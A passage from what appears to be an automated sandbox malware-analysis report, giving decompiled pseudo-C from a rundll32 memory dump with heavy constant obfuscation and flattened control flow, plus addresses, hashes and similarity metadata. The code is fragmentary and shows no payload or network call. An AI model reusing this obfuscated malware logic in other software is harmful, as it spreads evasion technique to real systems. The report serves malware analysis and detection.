                                                                                                                                  				_v2652 = _v2652 * 0x5a;
                                                                                                                                  				_v2652 = _v2652 ^ 0x0bc440cb;
                                                                                                                                  				_v2720 = 0x771a3f;
                                                                                                                                  				_v2720 = _v2720 >> 0xe;
                                                                                                                                  				_v2720 = _v2720 + 0x9ab6;
                                                                                                                                  				_v2720 = _v2720 ^ 0x0000c33a;
                                                                                                                                  				_v2688 = 0x2271c;
                                                                                                                                  				_v2688 = _v2688 / _t450;
                                                                                                                                  				_v2688 = _v2688 << 9;
                                                                                                                                  				_v2688 = _v2688 ^ 0x0000f5c5;
                                                                                                                                  				_v2608 = 0xceafd9;
                                                                                                                                  				_t451 = 0x5b;
                                                                                                                                  				_v2608 = _v2608 / _t451;
                                                                                                                                  				_v2608 = _v2608 ^ 0x00020c5c;
                                                                                                                                  				_v2644 = 0x474c12;
                                                                                                                                  				_v2644 = _v2644 + 0xffff00ab;
                                                                                                                                  				_v2644 = _v2644 ^ 0x00446b0a;
                                                                                                                                  				_v2760 = 0xca1d14;
                                                                                                                                  				_t452 = 0x36;
                                                                                                                                  				_v2760 = _v2760 / _t452;
                                                                                                                                  				_v2760 = _v2760 ^ 0x098f5074;
                                                                                                                                  				_v2760 = _v2760 ^ 0x8a27b7fe;
                                                                                                                                  				_v2760 = _v2760 ^ 0x83afe7c4;
                                                                                                                                  				_v2636 = 0x5d1272;
                                                                                                                                  				_v2636 = _v2636 + 0xf4cf;
                                                                                                                                  				_v2636 = _v2636 ^ 0x005057cd;
                                                                                                                                  				_v2768 = 0x30e751;
                                                                                                                                  				_v2768 = _v2768 | 0xcda5a365;
                                                                                                                                  				_t453 = 5;
                                                                                                                                  				_v2768 = _v2768 * 0x7d;
                                                                                                                                  				_v2768 = _v2768 + 0xffff52f5;
                                                                                                                                  				_v2768 = _v2768 ^ 0x71df24ad;
                                                                                                                                  				_v2772 = 0x3d9f4c;
                                                                                                                                  				_v2772 = _v2772 / _t453;
                                                                                                                                  				_v2772 = _v2772 | 0x64d73223;
                                                                                                                                  				_v2772 = _v2772 >> 2;
                                                                                                                                  				_v2772 = _v2772 ^ 0x1935e4e1;
                                                                                                                                  				_v2744 = 0xaeb35;
                                                                                                                                  				_v2744 = _v2744 << 0x10;
                                                                                                                                  				_v2744 = _v2744 + 0xffff2953;
                                                                                                                                  				_v2744 = _v2744 + 0xffff82ad;
                                                                                                                                  				_v2744 = _v2744 ^ 0xeb3966f5;
                                                                                                                                  				_v2752 = 0x66dc67;
                                                                                                                                  				_v2752 = _v2752 + 0x90a4;
                                                                                                                                  				_v2752 = _v2752 + 0x6fc1;
                                                                                                                                  				_v2752 = _v2752 ^ 0x6a9d4e17;
                                                                                                                                  				_v2752 = _v2752 ^ 0x6af88c69;
                                                                                                                                  				_v2716 = 0xce0c89;
                                                                                                                                  				_v2716 = _v2716 ^ 0x42dcf22f;
                                                                                                                                  				_v2716 = _v2716 | 0xbb0a480d;
                                                                                                                                  				_v2716 = _v2716 ^ 0xfb186e5d;
                                                                                                                                  				_v2616 = 0x5746b3;
                                                                                                                                  				_v2616 = _v2616 | 0xa6a5976e;
                                                                                                                                  				_v2616 = _v2616 ^ 0xa6f469a2;
                                                                                                                                  				_v2708 = 0xa6d434;
                                                                                                                                  				_v2708 = _v2708 << 0xa;
                                                                                                                                  				_v2708 = _v2708 | 0x1b169a68;
                                                                                                                                  				_v2708 = _v2708 ^ 0x9b5e88e0;
                                                                                                                                  				_v2736 = 0x9f8594;
                                                                                                                                  				_v2736 = _v2736 + 0xffffc5c7;
                                                                                                                                  				_t454 = 9;
                                                                                                                                  				_v2736 = _v2736 / _t454;
                                                                                                                                  				_v2736 = _v2736 + 0xffff650c;
                                                                                                                                  				_v2736 = _v2736 ^ 0x001c27e2;
                                                                                                                                  				_v2668 = 0xeff616;
                                                                                                                                  				_v2668 = _v2668 << 4;
                                                                                                                                  				_v2668 = _v2668 ^ 0x0efcbcf0;
                                                                                                                                  				_v2640 = 0x84564;
                                                                                                                                  				_v2640 = _v2640 >> 9;
                                                                                                                                  				_v2640 = _v2640 ^ 0x00099447;
                                                                                                                                  				_v2648 = 0xb94e9c;
                                                                                                                                  				_v2648 = _v2648 >> 7;
                                                                                                                                  				_v2648 = _v2648 ^ 0x000c8381;
                                                                                                                                  				_v2656 = 0x4f0029;
                                                                                                                                  				_v2656 = _v2656 * 0x26;
                                                                                                                                  				_v2656 = _v2656 ^ 0x0bb68559;
                                                                                                                                  				_v2700 = 0xc64297;
                                                                                                                                  				_v2700 = _v2700 << 0x10;
                                                                                                                                  				_v2700 = _v2700 ^ 0xb6f38c4d;
                                                                                                                                  				_v2700 = _v2700 ^ 0xf46a369f;
                                                                                                                                  				_v2664 = 0x51e71d;
                                                                                                                                  				_v2664 = _v2664 * 0xf;
	_v2664 = _v2664 ^ 0x04c73adc;
	_v2728 = 0xfedaba;
	_v2728 = _v2728 + 0xfffff930;
	_v2728 = _v2728 + 0xfffff3b0;
	_v2728 = _v2728 + 0xffff7b6e;
	_v2728 = _v2728 ^ 0x00f92d7b;
	_v2632 = 0xc4e34f;
	_t425 = _v2632 * 0x17;
	_v2632 = _t425;
	_v2632 = _v2632 ^ 0x11b64b79;
	_v2676 = 0x4fbb37;
	_v2676 = _v2676 + 0x433;
	_v2676 = _v2676 >> 1;
	_v2676 = _v2676 ^ 0x002442b0;
	_v2724 = 0xe01143;
	_v2724 = _v2724 | 0x0dc37ba2;
	_v2724 = _v2724 + 0xe020;
	_v2724 = _v2724 ^ 0x0dec213c;
	_v2624 = 0xd4ff52;
	_v2624 = _v2624 << 0xe;
	_v2624 = _v2624 ^ 0x3fd02267;
	_v2692 = 0xfd19e6;
	_v2692 = _v2692 + 0x8b9c;
	_v2692 = _v2692 | 0x5cbd23eb;
	_v2692 = _v2692 ^ 0x5cf129d9;
	while(_t503 != 0x5de06da) {
		if(_t503 == 0xea1969c) {
			_t503 = 0xfa9128f;
			continue;
		} else {
			_t515 = _t503 - 0xfa9128f;
			if(_t503 != 0xfa9128f) {
				L8:
				__eflags = _t503 - 0xa8e801c;
				if(__eflags != 0) {
					continue;
				}
			} else {
				E002EDA22(_v2696, _v2748, _t515, _v2604,  &_v2600, _t454, _v2684);
				 *((short*)(E002DB6CF( &_v2600, _v2764, _v2680, _v2712))) = 0;
				E002D8969(_v2612,  &_v1560, _t515, _v2732, _v2704);
				_push(_v2660);
				_push(_v2756);
				E002D47CE( &_v2600, _v2672, _v2620, _v2740, _v2652, E002EDCF7(_v2620, 0x2d1308, _t515),  &_v1560, _v2720, _v2688);
				E002DA8B0(_v2608, _t437, _v2644);
				_t454 = _v2760;
				_t425 = E002DEA99(_v2760, _t502, _v2636, _v2768,  &_v2080, _v2772);
				_t507 =  &(_t507[0x17]);
				if(_t425 != 0) {
					_t503 = 0x5de06da;
					continue;
				}
			}
		}
		return _t425;
	}
	_push(_v2616);
	_push(_v2628);
	_push(_v2716);
	_push( &_v1040);
	E002E46BB(_v2744, _v2752);
	_push(_v2668);
	_push(_v2736);
	E002D47CE( &_v1040, _v2640, _v2708, _v2648, _v2656, E002EDCF7(_v2708, 0x2d1348, __eflags),  &_v2080, _v2700, _v2664);
	_t458 = _v2728;
	E002DA8B0(_t458, _t428, _v2632);
	_push(_v2692);
	_push(0);
	_push(_t458);
	_push(0);
	_push(0);
	_push(_v2624);
	_t454 = _v2676;
	_push( &_v520);
	_t425 = E002DAB87(_v2676, _v2724, __eflags);
	_t507 = _t507 - 0xc + 0x64;
	_t503 = 0xa8e801c;
	goto L8;
}
                                                                                                                                  0x002df624
                                                                                                                                  0x002df62c
                                                                                                                                  0x002df630
                                                                                                                                  0x002df638
                                                                                                                                  0x002df640
                                                                                                                                  0x002df648
                                                                                                                                  0x002df650
                                                                                                                                  0x002df658
                                                                                                                                  0x002df663
                                                                                                                                  0x002df66b
                                                                                                                                  0x002df676
                                                                                                                                  0x002df67e
                                                                                                                                  0x002df686
                                                                                                                                  0x002df68e
                                                                                                                                  0x002df696
                                                                                                                                  0x002df6a4
                                                                                                                                  0x002df7b0
                                                                                                                                  0x00000000
                                                                                                                                  0x002df6aa
                                                                                                                                  0x002df6aa
                                                                                                                                  0x002df6b0
                                                                                                                                  0x002df883
                                                                                                                                  0x002df883
                                                                                                                                  0x002df889
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002df6b6
                                                                                                                                  0x002df6d2
                                                                                                                                  0x002df700
                                                                                                                                  0x002df70a
                                                                                                                                  0x002df70f
                                                                                                                                  0x002df71b
                                                                                                                                  0x002df762
                                                                                                                                  0x002df777
                                                                                                                                  0x002df795
                                                                                                                                  0x002df799
                                                                                                                                  0x002df79e
                                                                                                                                  0x002df7a3
                                                                                                                                  0x002df7a9
                                                                                                                                  0x00000000
                                                                                                                                  0x002df7a9
                                                                                                                                  0x002df7a3
                                                                                                                                  0x002df6b0
                                                                                                                                  0x002df898
                                                                                                                                  0x002df898
                                                                                                                                  0x002df7ba
                                                                                                                                  0x002df7c8
                                                                                                                                  0x002df7cf
                                                                                                                                  0x002df7de
                                                                                                                                  0x002df7df
                                                                                                                                  0x002df7e4
                                                                                                                                  0x002df7f0
                                                                                                                                  0x002df837
                                                                                                                                  0x002df843
                                                                                                                                  0x002df849
                                                                                                                                  0x002df858
                                                                                                                                  0x002df85c
                                                                                                                                  0x002df85e
                                                                                                                                  0x002df85f
                                                                                                                                  0x002df861
                                                                                                                                  0x002df863
                                                                                                                                  0x002df86e
                                                                                                                                  0x002df875
                                                                                                                                  0x002df876
                                                                                                                                  0x002df87b
                                                                                                                                  0x002df87e
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: kD$)$5$<!$Q0
                                                                                                                                  • API String ID: 0-101729813
                                                                                                                                  • Opcode ID: 41002a9ac84c7c5090ddd45aeebf3900ead9164cc56e113310500283a05bae81
                                                                                                                                  • Instruction ID: 7f5964b29f78df532ba46680f3750b26b81620e769132438bbd9b0bc3e7b5cc1
                                                                                                                                  • Opcode Fuzzy Hash: 41002a9ac84c7c5090ddd45aeebf3900ead9164cc56e113310500283a05bae81
                                                                                                                                  • Instruction Fuzzy Hash: 901210715083809FD3A8CF21C48AA8BFBE2FBC4718F50891DE6D986260D7B58959CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002E66CA() {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				signed int _v1044;
                                                                                                                                  				intOrPtr _v1048;
                                                                                                                                  				intOrPtr _v1052;
                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                  				unsigned int _v1060;
                                                                                                                                  				signed int _v1064;
                                                                                                                                  				signed int _v1068;
                                                                                                                                  				signed int _v1072;
                                                                                                                                  				signed int _v1076;
                                                                                                                                  				signed int _v1080;
                                                                                                                                  				signed int _v1084;
                                                                                                                                  				signed int _v1088;
                                                                                                                                  				signed int _v1092;
                                                                                                                                  				signed int _v1096;
                                                                                                                                  				signed int _v1100;
                                                                                                                                  				signed int _v1104;
                                                                                                                                  				signed int _v1108;
                                                                                                                                  				signed int _v1112;
                                                                                                                                  				signed int _v1116;
                                                                                                                                  				signed int _v1120;
                                                                                                                                  				signed int _v1124;
                                                                                                                                  				signed int _v1128;
                                                                                                                                  				signed int _v1132;
                                                                                                                                  				signed int _v1136;
                                                                                                                                  				signed int _v1140;
                                                                                                                                  				signed int _v1144;
                                                                                                                                  				signed int _v1148;
                                                                                                                                  				signed int _v1152;
                                                                                                                                  				signed int _v1156;
                                                                                                                                  				signed int _v1160;
                                                                                                                                  				signed int _v1164;
                                                                                                                                  				void* _t263;
                                                                                                                                  				void* _t264;
                                                                                                                                  				intOrPtr _t265;
                                                                                                                                  				void* _t268;
                                                                                                                                  				void* _t269;
                                                                                                                                  				signed int _t272;
                                                                                                                                  				signed int _t273;
                                                                                                                                  				signed int _t274;
                                                                                                                                  				signed int _t275;
                                                                                                                                  				intOrPtr _t282;
                                                                                                                                  				intOrPtr _t289;
                                                                                                                                  				intOrPtr _t306;
                                                                                                                                  				void* _t310;
                                                                                                                                  				signed int* _t314;
                                                                                                                                  
                                                                                                                                  				_t314 =  &_v1164;
                                                                                                                                  				_v1044 = _v1044 & 0x00000000;
                                                                                                                                  				_v1056 = 0xc409ba;
                                                                                                                                  				_v1052 = 0xa85c92;
                                                                                                                                  				_v1048 = 0x441ffc;
                                                                                                                                  				_v1160 = 0xafc02f;
                                                                                                                                  				_v1160 = _v1160 + 0xffff4fb0;
                                                                                                                                  				_v1160 = _v1160 + 0x85f3;
                                                                                                                                  				_t272 = 0x2a;
                                                                                                                                  				_v1160 = _v1160 / _t272;
                                                                                                                                  				_v1160 = _v1160 ^ 0x000b1184;
                                                                                                                                  				_t310 = 0xb516bbb;
                                                                                                                                  				_v1060 = 0xeb49a4;
                                                                                                                                  				_v1060 = _v1060 >> 5;
                                                                                                                                  				_v1060 = _v1060 ^ 0x00095d90;
                                                                                                                                  				_v1136 = 0x74fb0a;
                                                                                                                                  				_t273 = 0x7f;
                                                                                                                                  				_v1136 = _v1136 * 0x1e;
                                                                                                                                  				_v1136 = _v1136 ^ 0x978de9ec;
                                                                                                                                  				_v1136 = _v1136 ^ 0xad10b4f2;
                                                                                                                                  				_v1136 = _v1136 ^ 0x372b3a8e;
                                                                                                                                  				_v1152 = 0xb92c6e;
                                                                                                                                  				_v1152 = _v1152 ^ 0x0e0e3092;
                                                                                                                                  				_v1152 = _v1152 | 0x72fa6aba;
                                                                                                                                  				_v1152 = _v1152 + 0xffff103c;
                                                                                                                                  				_v1152 = _v1152 ^ 0x7efa5fdf;
                                                                                                                                  				_v1128 = 0x794cf8;
                                                                                                                                  				_v1128 = _v1128 ^ 0x9a366bfc;
                                                                                                                                  				_v1128 = _v1128 + 0xde36;
                                                                                                                                  				_v1128 = _v1128 ^ 0x5c71c30d;
                                                                                                                                  				_v1128 = _v1128 ^ 0xc6263e62;
                                                                                                                                  				_v1156 = 0x79c02;
                                                                                                                                  				_v1156 = _v1156 + 0xfffffb46;
                                                                                                                                  				_v1156 = _v1156 | 0x060cf66c;
                                                                                                                                  				_v1156 = _v1156 ^ 0x799dfdb7;
                                                                                                                                  				_v1156 = _v1156 ^ 0x7f9bfbef;
                                                                                                                                  				_v1164 = 0xbfcf15;
                                                                                                                                  				_v1164 = _v1164 >> 3;
                                                                                                                                  				_v1164 = _v1164 << 0xc;
                                                                                                                                  				_v1164 = _v1164 << 3;
                                                                                                                                  				_v1164 = _v1164 ^ 0xfcf89fe4;
                                                                                                                                  				_v1112 = 0xe0c8d1;
                                                                                                                                  				_v1112 = _v1112 ^ 0xbad245c5;
                                                                                                                                  				_v1112 = _v1112 << 5;
                                                                                                                                  				_v1112 = _v1112 ^ 0x4653cc84;
                                                                                                                                  				_v1116 = 0x38a8e4;
                                                                                                                                  				_v1116 = _v1116 + 0xffff2cc2;
                                                                                                                                  				_v1116 = _v1116 + 0x453c;
                                                                                                                                  				_v1116 = _v1116 ^ 0x0030e111;
                                                                                                                                  				_v1144 = 0x8706d;
                                                                                                                                  				_v1144 = _v1144 | 0x44a168a8;
                                                                                                                                  				_v1144 = _v1144 * 0x4d;
                                                                                                                                  				_v1144 = _v1144 >> 0x10;
                                                                                                                                  				_v1144 = _v1144 ^ 0x0002b082;
                                                                                                                                  				_v1068 = 0x3ad283;
                                                                                                                                  				_v1068 = _v1068 + 0xc4d8;
                                                                                                                                  				_v1068 = _v1068 ^ 0x003ad5e6;
                                                                                                                                  				_v1148 = 0xbbdd96;
                                                                                                                                  				_v1148 = _v1148 / _t273;
                                                                                                                                  				_v1148 = _v1148 + 0xffff10a8;
                                                                                                                                  				_v1148 = _v1148 + 0xdbb9;
                                                                                                                                  				_v1148 = _v1148 ^ 0x00089235;
                                                                                                                                  				_v1084 = 0xf8cace;
                                                                                                                                  				_v1084 = _v1084 ^ 0x230d76f6;
                                                                                                                                  				_v1084 = _v1084 ^ 0x23f29212;
                                                                                                                                  				_v1140 = 0x18cea;
                                                                                                                                  				_v1140 = _v1140 << 3;
                                                                                                                                  				_v1140 = _v1140 << 0xa;
                                                                                                                                  				_v1140 = _v1140 + 0xffff66c6;
                                                                                                                                  				_v1140 = _v1140 ^ 0x3196ba0a;
                                                                                                                                  				_v1104 = 0x64ea4d;
                                                                                                                                  				_v1104 = _v1104 >> 0xe;
                                                                                                                                  				_v1104 = _v1104 << 0x10;
                                                                                                                                  				_v1104 = _v1104 ^ 0x01951052;
                                                                                                                                  				_v1120 = 0x40e961;
                                                                                                                                  				_v1120 = _v1120 ^ 0xb7fb83c2;
                                                                                                                                  				_v1120 = _v1120 + 0xb75e;
                                                                                                                                  				_v1120 = _v1120 ^ 0xb7bbc099;
                                                                                                                                  				_v1096 = 0x7779e0;
                                                                                                                                  				_v1096 = _v1096 | 0x86983bb4;
                                                                                                                                  				_v1096 = _v1096 ^ 0x86f0c1f2;
                                                                                                                                  				_v1100 = 0xda5543;
                                                                                                                                  				_v1100 = _v1100 + 0xffff2368;
                                                                                                                                  				_v1100 = _v1100 + 0xffff6302;
                                                                                                                                  				_v1100 = _v1100 ^ 0x00d61d50;
                                                                                                                                  				_v1132 = 0x843ae5;
                                                                                                                                  				_v1132 = _v1132 + 0xae05;
                                                                                                                                  				_v1132 = _v1132 >> 9;
                                                                                                                                  				_v1132 = _v1132 | 0xb52a1de5;
                                                                                                                                  				_v1132 = _v1132 ^ 0xb5269cc0;
                                                                                                                                  				_v1064 = 0x4bdca1;
                                                                                                                                  				_t274 = 0x36;
                                                                                                                                  				_v1064 = _v1064 * 0x2d;
                                                                                                                                  				_v1064 = _v1064 ^ 0x0d50802d;
                                                                                                                                  				_v1076 = 0xc70263;
                                                                                                                                  				_v1076 = _v1076 ^ 0xed1c16c4;
                                                                                                                                  				_v1076 = _v1076 ^ 0xeddf4f32;
                                                                                                                                  				_v1108 = 0x3676a5;
                                                                                                                                  				_v1108 = _v1108 << 0x10;
                                                                                                                                  				_v1108 = _v1108 << 8;
                                                                                                                                  				_v1108 = _v1108 ^ 0xa501f64e;
                                                                                                                                  				_v1088 = 0x1a5bc1;
                                                                                                                                  				_v1088 = _v1088 / _t274;
                                                                                                                                  				_v1088 = _v1088 ^ 0x00023ab9;
                                                                                                                                  				_v1092 = 0xcce8ca;
                                                                                                                                  				_v1092 = _v1092 + 0xffff41cd;
                                                                                                                                  				_v1092 = _v1092 ^ 0x00c96fdb;
                                                                                                                                  				_v1072 = 0x26dee9;
                                                                                                                                  				_t275 = 0x31;
                                                                                                                                  				_v1072 = _v1072 * 0x7c;
                                                                                                                                  				_v1072 = _v1072 ^ 0x12da7d33;
                                                                                                                                  				_v1124 = 0xc51f8;
                                                                                                                                  				_v1124 = _v1124 * 0x7c;
                                                                                                                                  				_v1124 = _v1124 | 0x22e20644;
                                                                                                                                  				_v1124 = _v1124 + 0xffff053d;
                                                                                                                                  				_v1124 = _v1124 ^ 0x27f3e63a;
                                                                                                                                  				_v1080 = 0x33633f;
                                                                                                                                  				_v1080 = _v1080 / _t275;
                                                                                                                                  				_v1080 = _v1080 ^ 0x000716b7;
                                                                                                                                  				E002E5C73(_t275);
                                                                                                                                  				do {
                                                                                                                                  					while(_t310 != 0xc63ed) {
                                                                                                                                  						if(_t310 == 0x5b9c87d) {
                                                                                                                                  							_push(_v1104);
                                                                                                                                  							_push(_v1140);
                                                                                                                                  							_t263 = E002EDCF7(_v1084, 0x2d1060, __eflags);
                                                                                                                                  							_t264 = E002ED25E(_v1120);
                                                                                                                                  							_t282 =  *0x2f3e10; // 0x0
                                                                                                                                  							_t265 =  *0x2f3e10; // 0x0
                                                                                                                                  							E002E453F(_v1100, __eflags, _v1132, _t263, _v1064, _t265 + 0x23c, _t282 + 0x1c, _v1076, _v1108, _t264, _t282 + 0x1c);
                                                                                                                                  							_t268 = E002DA8B0(_v1088, _t263, _v1092);
                                                                                                                                  							_t314 =  &(_t314[0xa]);
                                                                                                                                  							_t310 = 0xc63ed;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t310 == 0xb516bbb) {
                                                                                                                                  								_t310 = 0xc84e726;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								_t319 = _t310 - 0xc84e726;
                                                                                                                                  								if(_t310 == 0xc84e726) {
                                                                                                                                  									_push(_v1128);
                                                                                                                                  									_push(_v1152);
                                                                                                                                  									_t269 = E002EDCF7(_v1136, 0x2d1000, _t319);
                                                                                                                                  									_t289 =  *0x2f3e10; // 0x0
                                                                                                                                  									_t306 =  *0x2f3e10; // 0x0
                                                                                                                                  									E002D47CE(_t306 + 0x23c, _v1156, _t289 + 0x1c, _v1164, _v1112, _t269, _t289 + 0x1c, _v1116, _v1144);
                                                                                                                                  									_t268 = E002DA8B0(_v1068, _t269, _v1148);
                                                                                                                                  									_t314 =  &(_t314[9]);
                                                                                                                                  									_t310 = 0x5b9c87d;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L9;
                                                                                                                                  					}
                                                                                                                                  					_push(_v1080);
                                                                                                                                  					_push( &_v1040);
                                                                                                                                  					_push(_v1124);
                                                                                                                                  					E002F13AD(_v1072,  &_v520, __eflags);
                                                                                                                                  					_t314 =  &(_t314[3]);
                                                                                                                                  					_t310 = 0xafb2886;
                                                                                                                                  					L9:
                                                                                                                                  					__eflags = _t310 - 0xafb2886;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				return _t268;
                                                                                                                                  			}
                                                                                                                                  0x002e6a82
                                                                                                                                  0x002e6b0d
                                                                                                                                  0x002e6b16
                                                                                                                                  0x002e6b1e
                                                                                                                                  0x002e6b2f
                                                                                                                                  0x002e6b34
                                                                                                                                  0x002e6b47
                                                                                                                                  0x002e6b6a
                                                                                                                                  0x002e6b7c
                                                                                                                                  0x002e6b81
                                                                                                                                  0x002e6b84
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a88
                                                                                                                                  0x002e6a8e
                                                                                                                                  0x002e6b06
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a90
                                                                                                                                  0x002e6a90
                                                                                                                                  0x002e6a92
                                                                                                                                  0x002e6a98
                                                                                                                                  0x002e6aa1
                                                                                                                                  0x002e6aa9
                                                                                                                                  0x002e6aba
                                                                                                                                  0x002e6ad2
                                                                                                                                  0x002e6ae5
                                                                                                                                  0x002e6af7
                                                                                                                                  0x002e6afc
                                                                                                                                  0x002e6aff
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6aff
                                                                                                                                  0x002e6a92
                                                                                                                                  0x002e6a8e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e6a82
                                                                                                                                  0x002e6b8e
                                                                                                                                  0x002e6b99
                                                                                                                                  0x002e6b9a
                                                                                                                                  0x002e6ba9
                                                                                                                                  0x002e6bae
                                                                                                                                  0x002e6bb1
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bb3
                                                                                                                                  0x002e6bc5

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <E$?c3$Md$a@$yw
                                                                                                                                  • API String ID: 0-2084988834
                                                                                                                                  • Opcode ID: f8e1bd6eccdf858b7517a355da554131bf3f872f1437b3637ffb919dd2b282de
                                                                                                                                  • Instruction ID: f114222784f08292bd2d21ee158f55f7a30a94da6309127868e32ccba808dec6
                                                                                                                                  • Opcode Fuzzy Hash: f8e1bd6eccdf858b7517a355da554131bf3f872f1437b3637ffb919dd2b282de
                                                                                                                                  • Instruction Fuzzy Hash: 4EC120724083809FD368DF26D58A81BBBF2FBD4758F508A1DF5A596260D3B58909CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                  			E002D7735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                  				char _v44;
                                                                                                                                  				void* _v56;
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				unsigned int _v112;
                                                                                                                                  				unsigned int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* _t163;
                                                                                                                                  				signed int _t176;
                                                                                                                                  				void* _t188;
                                                                                                                                  				signed int _t205;
                                                                                                                                  				signed int* _t207;
                                                                                                                                  				void* _t209;
                                                                                                                                  				void* _t210;
                                                                                                                                  
                                                                                                                                  				_t186 = _a4;
                                                                                                                                  				_t207 = _a8;
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_t207);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t163);
                                                                                                                                  				_v60 = 0x524796;
                                                                                                                                  				_t210 = _t209 + 0x18;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_t188 = 0x9c25eae;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v76 = 0x29f01;
                                                                                                                                  				_v76 = _v76 | 0x94be009d;
                                                                                                                                  				_v76 = _v76 ^ 0x94be9f9d;
                                                                                                                                  				_v108 = 0xafa956;
                                                                                                                                  				_v108 = _v108 + 0x628;
                                                                                                                                  				_v108 = _v108 ^ 0xf539d3de;
                                                                                                                                  				_v108 = _v108 ^ 0xf5927b2e;
                                                                                                                                  				_v92 = 0x300c11;
                                                                                                                                  				_v92 = _v92 ^ 0x95f7d427;
                                                                                                                                  				_v92 = _v92 ^ 0x95c19bc8;
                                                                                                                                  				_v116 = 0x7fd72e;
                                                                                                                                  				_v116 = _v116 >> 0x10;
                                                                                                                                  				_v116 = _v116 + 0x5d9b;
                                                                                                                                  				_v116 = _v116 ^ 0x0001fda4;
                                                                                                                                  				_v88 = 0x25a82f;
                                                                                                                                  				_t205 = 0x1b;
                                                                                                                                  				_v88 = _v88 * 0x72;
                                                                                                                                  				_v88 = _v88 ^ 0x10cad58f;
                                                                                                                                  				_v100 = 0xf91ce5;
                                                                                                                                  				_v100 = _v100 >> 0xc;
                                                                                                                                  				_v100 = _v100 ^ 0x71d91e41;
                                                                                                                                  				_v100 = _v100 ^ 0x71d9c87d;
                                                                                                                                  				_v136 = 0x5a524;
                                                                                                                                  				_v136 = _v136 ^ 0x65d544fc;
                                                                                                                                  				_v136 = _v136 / _t205;
                                                                                                                                  				_v136 = _v136 + 0xdad4;
                                                                                                                                  				_v136 = _v136 ^ 0x03c43220;
                                                                                                                                  				_v68 = 0xd5537a;
                                                                                                                                  				_v68 = _v68 + 0xffffd52f;
                                                                                                                                  				_v68 = _v68 ^ 0x00d2b66c;
                                                                                                                                  				_v128 = 0x59397b;
                                                                                                                                  				_v128 = _v128 ^ 0x5dfc0cc3;
                                                                                                                                  				_v128 = _v128 + 0x56f6;
                                                                                                                                  				_v128 = _v128 + 0xff83;
                                                                                                                                  				_v128 = _v128 ^ 0x5dafd3d4;
                                                                                                                                  				_v104 = 0x85edfa;
                                                                                                                                  				_v104 = _v104 | 0x32b3baf7;
                                                                                                                                  				_v104 = _v104 ^ 0x32b12396;
                                                                                                                                  				_v112 = 0x4c4fc6;
                                                                                                                                  				_v112 = _v112 + 0xbf9f;
                                                                                                                                  				_v112 = _v112 >> 1;
                                                                                                                                  				_v112 = _v112 ^ 0x002f2047;
                                                                                                                                  				_v120 = 0xc21a43;
                                                                                                                                  				_v120 = _v120 | 0x0781619f;
                                                                                                                                  				_v120 = _v120 ^ 0x30a197e6;
                                                                                                                                  				_v120 = _v120 ^ 0x376a3e6d;
                                                                                                                                  				_v84 = 0xaf6a80;
                                                                                                                                  				_v84 = _v84 + 0xffff12f3;
                                                                                                                                  				_v84 = _v84 ^ 0x00ae6f5f;
                                                                                                                                  				_v64 = 0x7bdfb0;
